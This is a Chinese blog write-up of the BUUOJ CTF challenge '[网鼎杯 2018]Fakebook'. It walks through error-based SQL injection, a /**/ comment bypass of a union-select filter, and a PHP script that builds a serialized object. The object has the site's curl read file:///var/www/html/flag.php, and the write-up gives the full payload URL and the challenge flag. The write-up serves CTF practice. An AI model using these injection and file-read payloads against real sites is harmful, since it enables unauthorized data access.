第二十七题——[网鼎杯 2018]Fakebook

最新推荐文章于 2022-03-15 10:06:07 发布
最新推荐文章于 2022-03-15 10:06:07 发布
阅读量210 收藏
点赞数
分类专栏: CTF-WEB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/115858587
版权
题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,看到登录注册界面,点击注册,注册一个新用户

在这里插入图片描述

在这里插入图片描述

第二步:点击个人信息界面的username超链接,看到刚刚填写的blog信息被加载出来,猜想填写flag.php就可以获取到flag

在这里插入图片描述

第三步:获取flag.php

在url上的参数no上添加’获取到路径/var/www/html/db.php,猜测flag位于/var/www/html/flag.php

第四步:注册新用户,blog填写flag.php,发现flag关键字被拦截

在这里插入图片描述

第五步:转化思路在no参数上进行sql注入

  1. 使用报错注入extractvalue获取到数据库名:fakebook,表名:users,以及字段名:no,username,passwd,data,USER,CUR
  2. 查看data数据看到序列化内容,猜想通过union select查询时将data参数中blog修改为flag.php来绕过waf查看flag,注:union select查询时如果查询的数据没有在数据库中会自动添加进去。
    在这里插入图片描述

第六步:获取序列化文件

  1. 使用dirsearch扫描查看到robots.txt
    在这里插入图片描述
  2. 访问robots.txt获取到user.php.bak
    在这里插入图片描述
  3. 查看user.php获取到类构建方式
    在这里插入图片描述
  4. 通过user.php.bak了解到blog加载方式时使用curl,curl支持http以及file,可以通过file://xxx来查看flag.php
    在这里插入图片描述
  5. 自定义类,获取包含flag.php的序列化内容:
<?php  

class UserInfo
{
    public $name = "qwe";
    public $age = 123;
    public $blog = "file:///var/www/html/flag.php";
}

$a = serialize(new UserInfo);
echo $a
?> 
结果:
O:8:"UserInfo":3:{s:4:"name";s:3:"qwe";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

第七步:使用union select获取flag

经测试:union select被过滤,需要使用/**/union/**/select来绕过
具体语句:?no=0/**/union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:3:"qwe";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'#,在iframe标签中获取到flag的base64编码,解码得:flag{f3f66058-70fb-4514-9018-95ff4f83f3b0}
在这里插入图片描述
在这里插入图片描述

想学习安全的小白
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网鼎杯 2018]Fakebook思路&过程
iamblackcat's blog
09-12 1728
[网鼎杯 2018]Fakebook思路&过程
网络安全实验室CTF练习部分目(持续更新)
技术学习人生
06-29 8万+
1、脚本关:微笑一下,过关地址:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php 查看源代码: include('flag.php'); $smile = 1; if (!isset ($_GET['^_^'])) $smile = 0; if (preg_match
为什么select * || flag from flag 不行呢?
wojiushilsy的博客
04-27 1574
首先*(星号)在SQL语句中有特殊的意义。应该是保留字或关键字 (没找到*(星号)属于什么) 。 所以你直接使用 select * || flag from flag 会报语法错误。 实验一: 这是一张表 查询语句 SELECT *||mpassword FROM rjqm.manager; 结果: 和查询语句 SELECT .||mpassword FROM rjqm.manager; 结果是...
CTF平台库writeup(四)--BugKuCTF-代码审计(14详解)
渗透、攻防、CTF、编程
07-04 4384
1、extract变量覆盖 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content) { echo'flag{xxx}'; } else { echo'Oh.no'; } } ?> 知识点: 变量覆盖 file_get_contents():将整个文件读入一个字符串 trim()去除字符串两侧的空格或者指定
CTF-练习平台 writeup web
heySister
12-20 2万+
bugku Web WriteUp 刚刚接触ctf没多久,做ctf-练习平台上的目,有些新的目,在网上没有找到对应的writeup,所以做了之后就想自己写一个,也顺便理理自己的思路。(没有太多经验…可能对有些目的理解还不深刻…) 签到 加群在公告里就可以看到flag值了。 Web2 F12,立马就看到flag的值了。 文件上传测试 目说是...
fakebook:Facebook的克隆
05-23
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
mp12_social_network_fakebook_person
05-15
Mp12-社交网络(Fakebook)(人)[ManyToMany] 该应用程序将具有一个名为Person的实体,可以通过/ persons端点进行管理。 帖子将添加一个人,获取将显示所有这些人。 为了使一个人与另一个人成为朋友,我们将向终端...
fakebook-backend:学习个人项目探索MERN堆栈
04-10
Fakebook后端(express和mongodb)(这是一个学习/探索MERN堆栈的个人项目)入门: 确保已安装节点克隆仓库在fakebook文件夹中,创建一个带有dev.env文件的配置文件夹设置环境变量:PORT:value,MONGODB_URL = ...
Fakebook-Day2:在第2天之后,在完善蓝图功能之前
03-31
在第二天的开发阶段,我们的重点在于完善项目的蓝图(Blueprint)功能,这是Django或Flask等Web框架中的一个重要概念。 蓝图在Python Web开发中扮演着模块化设计的角色,它允许我们将大型应用分解为多个小而独立的...
webcrawler:一个简单的Java实现的网络爬虫,支持自动登录
06-24
第一个网络爬虫介绍Webcrawler 是一个简单的网络爬虫。 它实现了自动登录和内容获取的基本功能。 Webcrawler 将首先尝试使用提供的用户名和密码登录 。 如果登录失败,程序将被终止。 登录后,爬虫将开始获取它可以...
CTF解-Bugku_Web_WriteUp (上)
道阻且长,行则将至。
08-16 8778
BugkuCTF平台是免费的CTF训练平台,目数量多网上解析全面对新手入门友好。 为了划水“强网杯”练习一下,先从Web部分下手…… N0.1 Web2 1、访问靶场链接,花里胡哨: 2、入门,直接查看搜索源码: 3、解决: No.2 计算器 额,这……没啥好所说的,原先限制前端字段输入长度为1,修改前端字段长度的限制即可: No.3 Web$_GET 1、看看解链接: 2、看到这没啥好说的……该提示的都提示了,直接获取 flag: No.4 Web$_POST 1、看看解链接:
sql注入中过滤关键字(union select等等)
没事我溜达
03-15 8518
今天来学习一下注入中关键字被过滤了该如何解决 打开靶场,这是我本地搭建的一个靶场所以没有靶场地址 我们在输入框内输入一个1 查询一下结果。 尝试闭合和注释,发现单引号即可完成闭合,--+作为注释内容,通过order by查询列数 看到页面上方order的or被过滤,说明or即是关键词,我们双写or,变成 oorrder by 2 (一定要在or的中间双写or,不然两个都会被注释掉) 通过order by发现只有两列数据,那么开始联合注入 ...
掘安杯原复现-——flag到底在哪里
weixin_44866139的博客
04-13 2667
##掘安杯原复现——flag在哪里 打开目链接 点击flag在哪里,发现出现404notfound 查看网页源代码,发现没有提供有用信息 抓包试试,惊奇地发现flag,但并不是我们想要的 在线base64解密即可得到flag ...
BUUCTF_web部分
ro4lsc的博客
04-14 1万+
[极客大挑战 2019]Havefun [CISCN2019 华北赛区 Day2 Web1]Hack World [极客大挑战 2019]Secret File [极客大挑战 2019]Knife [极客大挑战 2019]LoveSQL [极客大挑战 2019]Http [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]BabySQL [极客大挑战 2019]BuyFlag [ZJCTF 2019]NiZhuanSiWei [ACTF2020 新生赛]Include
ctf php 字符串 过滤,ctfshow命令执行(50)与常见过滤的思考
weixin_39667041的博客
03-25 2539
源码:if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){system($c." >/dev/null 2>&1")...
bugku ctf 输入密码查看flag (暴力破解)
qq_42777804的博客
08-14 1万+
进去进去 都说用 burp 暴力破解      那我也来一下吧   其实 他目 已经给了 提示  爆破   那就 老规矩 burp拦截 之后发送给  intruder   我随便输的密码 选择数字型的   五位数 那就从 10000~99999   一步一步来 之后   等一会,上趟厕所接杯水       还没全部弄完发现 ...
bugkuCTF-练习平台
qq_36676979的博客
03-08 5315
web 1.web2 这查看源代码即可,火狐浏览器f12,查看器。 2.计算器 f12查看器,找到下面这行: <input type="text" class="input" maxlength="1"> 将maxlength改成位数比结果的的数,就可以输入了。 3.web基础$_GET 这个确实是基础,在get请求时,传入参数形式是在url后面加 ?参数=值。多个参数用 ?参...
献给web安全的CTF课堂小测
weixin_44765508的博客
11-18 1141
What’s your want? 根据目提示:Do you want flag?输入“flag”,返回一个加密字符串 2. base64 解密得到:flag{WelC0me_to_ctf2} php is the best 点击“another page”,查看源码,发现web目录的树结构中有flag文件 源码中还有对file路径的过滤: strpos():查找字符串第一次出现位置 https://www.w3school.com.cn/php/func_string_str
2016xctf一道ctf
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值